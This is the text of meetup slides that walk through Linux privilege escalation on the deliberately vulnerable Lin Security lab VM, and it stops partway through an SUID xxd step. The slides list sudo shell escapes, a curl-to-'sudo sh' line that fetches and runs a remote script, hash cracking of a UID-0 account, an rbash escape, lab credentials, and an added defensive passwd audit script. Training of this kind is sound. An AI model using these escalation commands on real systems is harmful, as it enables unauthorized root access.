These slides cover 30-40 different ways to do privilege escalation and become root. They were presented at Null Bhopal. Details on this link: https://null.co.in/events/491-bhopal-null-bhopal-meet-16-september-2018-monthly-meet
2. whoami
● Null Bhopal Chapter Lead
● Google Summer of Code at Debian
● NullCon 2018 volunteer
● Student UIT RGPV
● Open Source contributor
● Footballer
3. What do we know about Lin Security?
● Boot-to-root type
● Specifically for Linux privilege escalation
● Difficulty level - easy to intermediate
● The virtual machine is based on Ubuntu 18.04
● One user's username and password are bob / secret
4. Let's start by checking SSH
● We can use telnet for this
● If the banner prints the SSH version, then SSH is running on the box
11. With sudo -l we can see ways for privilege escalation
https://gtfobins.github.io/
12. Some of the easy ways are:
● sudo -i
● sudo ash
● sudo bash
● sudo sh
● sudo csh
● sudo dash
● sudo env /bin/sh
● sudo zsh
● sudo tclsh
● sudo expect -i
13. Medium level ways:
● sudo perl
○ then type exec "/bin/bash"; and press Ctrl+D
● sudo ftp
○ then type !/bin/bash
● sudo man id
○ then type !sh
14. ● sudo more /etc/passwd
○ then type !sh
● sudo vi
○ then type :bash
● sudo vi -c '!sh'
15. ● sudo awk 'BEGIN {system("id")}'
● sudo find /dev/null -exec sh \;
● We can abuse curl to run a script as root:
curl -sf -L https://raw.githubusercontent.com/d78ui98/Scripts/master/id.sh | sudo sh
19. ● Looking at /etc/passwd, we found the user insecurity.
● It is effectively a root user, as its UID is 0
● Its password hash is stored in /etc/passwd, so we can easily crack it with a cracking tool such as john
● Then we log in as insecurity and have root privileges
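The two weaknesses this slide relies on (a second UID-0 account, and a password hash left in the world-readable /etc/passwd instead of /etc/shadow) are easy to check for on a box you administer. The following audit script is an added example, not part of the original slides; the passwd contents are a constructed sample and the hash on the insecurity line is a placeholder, not a real hash.

```python
# Added example (not from the slides): audit /etc/passwd text for the
# weaknesses used in the Lin Security walkthrough. It takes the file
# contents as a string, so it runs offline on the constructed sample below
# or on a real copy of the file.
import re

# Constructed sample: "insecurity" imitates a second UID-0 account whose
# password hash sits directly in /etc/passwd (a crackable target);
# "nopass" has an empty password field. The hash value is a placeholder.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:bob:/home/bob:/bin/bash
susan:x:1001:1001:susan:/home/susan:/bin/rbash
insecurity:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHVALUE:0:0::/:/bin/bash
nopass::1002:1002::/home/nopass:/bin/sh
"""

# crypt(3) hash identifiers: $1$ (md5), $2a/b/y$ (bcrypt), $5$, $6$, $y$ (yescrypt)
HASH_PREFIX = re.compile(r"^\$(1|2[aby]?|5|6|y)\$")


def audit_passwd(text):
    """Return a list of (username, finding) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry on line %d" % lineno))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "non-root account with UID 0"))
        if pw == "":
            findings.append((name, "empty password field (no password required)"))
        elif HASH_PREFIX.match(pw):
            findings.append((name, "password hash stored in world-readable /etc/passwd"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE_PASSWD):
        print("%-12s %s" % (user, finding))
```

To run it against a live system, pass `open("/etc/passwd").read()` instead of the sample; a clean Ubuntu install should produce no findings.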
20. Let's get back to user susan
● We already know its password is MySuperS3cretValue!
22. ● Susan's login shell is rbash (restricted bash)
○ Reason 1: we cannot change directory
○ Reason 2: we cannot change PATH
● That's why we have really limited functionality
● I first thought of getting a normal shell
● We can do it with:
less .bashrc
:!sh
Or simply by running bash
24. Another approach with user susan
● I noticed that user susan is in the group itservices
● We can search for files that belong to the same group
25. There was a lot of output, but one particular result caught my attention
26. xxd makes a hexdump of a file, or reverses a hexdump back into binary
This is even more interesting:
27. ● The owner of /usr/bin/xxd is root
● The SUID bit makes the binary run with the privileges of its owner
● Its group owner is itservices, and the group has execute permission
● susan is also in the group itservices
● So we can run xxd, and therefore read files, as the root user
28. Next we need to find a way to get sensitive information out of xxd
29. After trying and failing with the options from man xxd, I came up with this: